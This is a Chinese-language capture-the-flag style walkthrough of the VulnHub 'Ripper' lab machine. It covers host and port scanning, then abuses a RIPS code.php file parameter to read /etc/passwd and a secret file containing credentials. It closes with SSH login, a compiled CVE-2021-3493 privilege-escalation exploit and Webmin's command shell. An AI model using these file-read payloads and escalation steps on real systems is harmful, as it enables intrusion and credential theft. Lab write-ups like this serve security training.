靶机实战系列之Ripper靶机

admin

139250
文章

114
评论

2024年5月13日01:59:44评论18 views字数 2047阅读6分49秒阅读模式

声明

该公众号大部分文章来自作者日常学习笔记，也有部分文章是经过作者授权和其他公众号白名单转载。请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。

靶机地址：

https://download.vulnhub.com/ripper/Ripper.ova

内容简介：
在这次打靶过程中,将使用到以下攻击手段：

主机发现

端口扫描

WEB信息搜索

内部系统泄漏

代码审计

备份文件泄密

Webmin漏洞利用

Metasploit

CVE-2021-3493

滑至文末,获取“searchall”下载链接!

1.1 主机发现

arp-scan  -l

靶机实战系列之Ripper靶机

1.2 端口扫描

nmap -p-  192.168.144.139

靶机实战系列之Ripper靶机

nmap -p22,80,10000 -sV  -A   192.168.144.138

Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-03 01:13 EDTNmap scan report for 192.168.144.139Host is up (0.00042s latency).PORT      STATE SERVICE VERSION22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))10000/tcp open  http    MiniServ 1.910 (Webmin httpd)MAC Address: 08:00:27:3A:BA:B6 (Oracle VirtualBox virtual NIC)Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 43.01 seconds

发现存在webmin

1.3 web信息收集

访问

https://192.168.144.139:10000

经过路径爬取

https://192.168.144.139:10000/robots.txt

得到这个页面

靶机实战系列之Ripper靶机

base64编码(密文)	原文
d2Ugc2NhbiBwaHAgY29kZXMgd2l0aCByaXBzCg==	we scan php codes with rips

靶机实战系列之Ripper靶机

经过分析，该靶机存在 rips 的应用，专门用来分析php源码

https://rips-scanner.sourceforge.net/

靶机实战系列之Ripper靶机

1.4 代码审计

访问

 http://192.168.144.139/rips/

靶机实战系列之Ripper靶机

使用此应用来分析其代码分析

输入根目录点击scan进行扫描

靶机实战系列之Ripper靶机

发现文件泄露

/var/www/html/rips/windows/code.php

靶机实战系列之Ripper靶机

尝试访问该网址

http://192.168.144.139/rips/windows/code.php?file=/var/www/html/rips/windows/code.php

靶机实战系列之Ripper靶机

可以读取该文件！

接下来指定关键字pass进行搜索

查看 /etc/passwd

靶机实战系列之Ripper靶机

http://192.168.144.139/rips/windows/code.php?file=/var/www/html/rips/secret.php

查看得到账号ripper密码Gamespeopleplay

1.5 提权

1.5.1 CVE-2021-3493

ssh   ripper@192.168.144.139     //密码为Gamespeopleplaylsb_release   -agcc -o exp   exploit.cscp exp  ripper@192.168.144.139./exp

靶机实战系列之Ripper靶机

根据操作系统版本推断出可以使用CVE-2021-3493来进行提权

靶机实战系列之Ripper靶机

ok提权成功

1.5.2 webmin日志

找到属主是cubes当前rippper可读的文件find  / -user cubes  -type f  -exec ls -la {} ; 2>/dev/nullcat  /mnt/secret.file      // 密码为   Il00tpeople

靶机实战系列之Ripper靶机

得到密码Il00tpeople

 su  cubes    // 密码  Il00tpeoplefind  / -user cubes  -type f  -exec ls -la {} ; 2>/dev/null | grep -v "proc" | grep -v ".png"

靶机实战系列之Ripper靶机

找到日志miniser.log

从日志里面找到了账号admin密码tokiohotel登录webmin

靶机实战系列之Ripper靶机

进入 webmin

靶机实战系列之Ripper靶机

点击 others - command shell

靶机实战系列之Ripper靶机

ok拿到权限！

靶机实战系列之Ripper靶机

注：如有侵权请后台联系进行删除

觉得内容不错,请点一下"赞"和"在看"

原文始发于微信公众号（嗨嗨安全）：靶机实战系列之Ripper靶机

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

靶机实战系列之Ripper靶机

白帽子通过 5 个步骤诱使 SSL.com 为阿里巴巴云域名颁发证书

K8s下的漏洞挖掘思路

一文看懂 JSON.parse 背后的安全隐患与黑盒利用方法

提示词宝库！NucleiPrompts 助你轻松玩转 Nuclei AI智能漏洞扫描

Webshell的检测

Vulhub - Goldeneye 黄金眼！

JsRpc结合yakit热加载实现签名破解

应急响应：Linux

渗透测试C2 - XiebroC2

记某次EDU从外网打点进内网

发表评论

在线咨询

微信